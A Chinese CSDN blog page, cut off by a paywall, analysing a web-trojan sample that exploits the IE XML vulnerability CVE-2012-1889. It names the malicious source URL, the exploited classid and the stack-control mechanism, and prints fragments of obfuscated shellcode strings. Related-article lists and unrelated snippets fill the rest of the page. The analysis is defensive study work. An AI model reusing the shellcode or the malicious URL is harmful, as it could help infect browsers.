简单分析了网马样本

最新推荐文章于 2023-02-16 14:49:19 发布
最新推荐文章于 2023-02-16 14:49:19 发布
阅读量4.2k 收藏
点赞数
分类专栏: 网马解密 文章标签: 网马分析 漏洞利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yd0str/article/details/9025983
版权

格式有点乱,利用的漏洞也没那么新,大家随便看看吧,欢迎交流~

一、漏洞信息收集

来源

http://a.prir.asia:82/sklh.html

 

Response contentSHA-256

0fde420792f009477206c0914d1275c0562706e431dcac4b57354ca630a0df47

 

从代码中的classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" 我们可以在网上搜索到

相关信息为

漏洞标题: IE暴雷0day漏洞(CVE-2012-1889)XML组件未名内存破坏漏洞

漏洞类型:远程代码执行

公开时间为: 2012-06-18

漏洞形式:使用DOM操作IMG节点的SRC设置nameProp属性填充调用栈,控制eax!

也就是eax的值来源于栈中,栈上的值未经初始化,被直接用作对象指针后就会出现问题,要稳定利用此漏洞就需要对eax的值进行控制,只要预先在栈上排布上我们的数据就可以实现该功能

http://www.wooyun.org/bugs/wooyun-2012-08435

http://www.freebuf.com/articles/4230.html

  二.分析过程

1. 首先查看样本内容,收集样本信息

可以通过工具或者手工查看该链接查看源代码

通过对源代码的浏览可以看出该样本是利用某种漏洞的EXP代码,根据代码中的

classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4"

可以查找出漏洞利用的信息,在上一节已经对信息进行了介绍

2. 具体的EXP分析过程

从代码中我们可以在head中看到一段相对比较清晰的exploit,进而进行分析

在head中的这个JS脚本中,就是对shellcode进行构造以及堆溢出点构造的过程,

其中的shellcode部分,是变量替换的形式构造,所以我们需要拿到完成的shellcode并进行解密

手工的构造过程也就是变量拼接,通过构造出的脚本如下:

<script>

var scytxtv="%ud5db%uc9c9%u87cd%u9292%u93dc%u8e8f%uc58d%ud393%uc9d8%u8487%uce92%ud1d6%u92d5%ud6ce%ud5d1%ud893%ud8c5%ubdbd%ubdbd";

var scwapx ="%ckwmuBckwmDBckwmD%uBDBckwmD%uBDBckwmD%uBDBD%uBDBckwmD%uBckwmDBD%uBDBckwmD%uBDBckwmD%uEAEA";

最低0.47元/天 解锁文章
code_AV
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
微软IE7 0day网马分析(图解)
12-11 1333
微软IE7 0day网马分析微软IE70day网页木马在javascript脚本中构造了一个恶意的xml串。xml串中存在一个格式异常标签且包含image标记的CDATA标记。因为CDATA标记的格式不正常,所以IE7解析xml时会继续解析CDATA标记中的image标记。这个image标记中的SRC也是经过构造的,它利用了IE7在解析URI时的一个漏洞。当IE7在解析imag
进击的短信拦截马
weixin_34162629的博客
03-08 406
瘦蛟舞 · 2015/09/22 15:27木马利用短信感觉受害者通信录中好友.利用"看你做的好事","看你做的龌龊事"等语句诱导用户安装.开始分析木马,首先查看其Manifest文件.从其申请短信/联系/联网的权限来看已经可以基本确认这是一款短信拦截马,貌似没啥新意不过可以从中发现一些以前没有的细节.感觉这个木马还是挺用心的。首先是installLocation属性的设置.android:ins...
“短信拦截马”黑色产业链与溯源取证研究
weixin_34319374的博客
03-08 455
猎豹科学院 · 2015/09/10 14:040x00 引言根据猎豹安全实验室的云端监控数据显示,近1个月截获的“短信拦截”类样本变种数量超过10万,影响用户数达数百万之多。“短信拦截”木马作为安卓手机病毒中的一类常见样本,近两年来显现出爆发增长的趋势,其背后的黑色产业链也日益发展壮大,“短信拦截马”的日趋泛滥已经成为移动支付、网银财产等各环节的焦点安全问题。“短信拦截马”导致网银资金被盗的新闻...
图片拖到任意处并记录相应的位置
最新发布
kingwin28的博客
02-16 18万+
图片拖到任意处并记录相应的位置
html樱花飘落特效js
existent
06-13 12万+
引入 <!-- 樱花特效引入 --> <script src="./sakura.js"></script> 或者 js源码 //樱花 sakura var stop, staticx; var img = new Image(); img.src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUgAAAEwCAYAAADVZeifAAAACXBIWXMAAACYAAAAmAGiyIKYAAAHG2lUWHRY
MeshShader:简单的网格着色器样本,可将带有IB的VB自动渲染到网格物体
03-13
在本案例中,我们关注的是一个使用Mesh Shader的简单示例,它能够自动地将带有索引缓冲区(IB)的顶点缓冲区(VB)渲染到网格物体上。这种技术通常用于游戏开发和高级图形应用程序,以实现更加复杂和动态的视觉效果...
Android平台几款新型的扣费木马深度分析.pdf
09-21
分析木马样本时,研究人员发现一些样本还包含了额外的功能,比如解密并执行其他可执行文件。其中一些木马不仅利用WAP计费服务盗取资金,还会安装名为Trojan-Banker.AndroidOS.Ubsod的银行木马。这个银行木马具有...
股市技术分析讲座会(ppt 28).pptx
09-23
本次股市技术分析讲座会由海峡指数(马)私人有限公司主办,旨在深入解析技术分析的各种概念和工具,帮助参与者理解和应用。 讲座内容主要包括以下几个方面: 1. **技术分析剖解**:这部分将详细讲解技术分析的...
距离判别分析理论在突出预测中的应用
06-05
为了更加准确的预测煤与瓦斯突出的危险性,基于距离判别分析理论,选取电磁辐射预测指标(电磁辐射强度E和脉冲数N)和常规指标R指标、钻孔瓦斯涌出初...,选取演马庄矿某掘进工作面2011年4、5月日常预测数据作为训练样本...
ffmpeg整体流程及视频格式分析(马德祥)
01-04
然后,它利用解码器(decoders)对这些流进行解码,将压缩的数据转化为原始的像素和音频样本。接下来,可以应用各种滤镜和处理步骤来改变视频内容或添加特效。最后,编码器(encoders)将处理后的数据重新编码成目标...
CC256x HCI Command
07-13
Bluetooth systems consists of a host and a controller. The BT SIG has created a standard protocol for the host to communicate with the controller. This is called the Host Controller Interface (HCI) which is specified in the BT Core 4.1 specification Volume 2 Part E. The HCI provides a uniform command interface to a Controller. There are some commands which are not listed in the specifications and they are specific to the device itself. These commands are vendor-specific commands (VS) generally used for testing and debugging purposes. For further details on testing command sequences, refer to CC256x Testing Guide.
WIN7_64 + CVE-2012-1889的分析
nethm的专栏
09-23 606
一 直接运行网上的POC 网页    双击cve-2012-1889-test-poc.html,发现IE崩溃了,此时的崩溃信息如下:   应用程序版本: 8.0.7601.17514   应用程序时间戳: 4ce79912   故障模块名称: msxml3.dll   故障模块版本: 8.110.7601.17514   故障模块时间戳: 4ce7b8e9   异常代码:
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3742
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
signature=f62f1ec47a85918a7d111dd1dcc3aa4e,ant-design-pro-vue
weixin_42518480的博客
05-30 9万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@ant-design/icons-vue@^1.0.1":version "1.0.1"resolved "https://registry.yarnpkg.com/@ant-design/icons-vue/-/icons-vue...
go技术文章精选(2019)
韩亚军的博客
01-03 10万+
gocn_news_set_2019 gocn_news_2019-12-31 Go 系列教程:https://dev.to/digitalocean/how-to-code-in-go-32p0 Go modules:最小版本选择 https://tonybai.com/2019/12/21/go-modules-minimal-version-selection/ 部署服...
BASE64转图片
lulu
06-23 2万+
Sctf 2019 签到题 cat /flag in data:image/jpeg;base64,/9j/4QBkRXhpZgAATU0AKgAAAAgABYdpAAQAAAABAAAASgESAAQAAAABAAAAAAEBAAMAAAABAa4AAAEyAAIAAAABAAAAAAEAAAMAAAABAa4AAAAAAAAAAZIIAAQAAAABAAAAAAAAAAD/4AAQSkZ...
signature=1a4f4cc2a4cb36682d90c0d4c84ca5da,dweb-mirror/yarn.lock at master · internetarchive/dweb-mi...
weixin_34615710的博客
05-29 10万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0", "@babel/code-frame@^7.8.3":version "7.8.3"resolved "https://registry.yarnpkg.com/@babel/co...
Windows exploit初探-栈溢出
qq_36495104的博客
07-02 1145
学习链接:https://www.fuzzysecurity.com
91.vido.ws v.php,"token" parameter not in video info for unknown reason;
热门推荐
weixin_35307279的博客
03-29 91万+
youtube-dl -v --dump-pages https://www.youtube.com/watch?v=USg3NR76XpQ output[debug] System config: [][debug] User config: [u'--add-metadata', u'--user-agent', u'Mozilla/5.0 (X11; Ubuntu; Linux x86_64...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值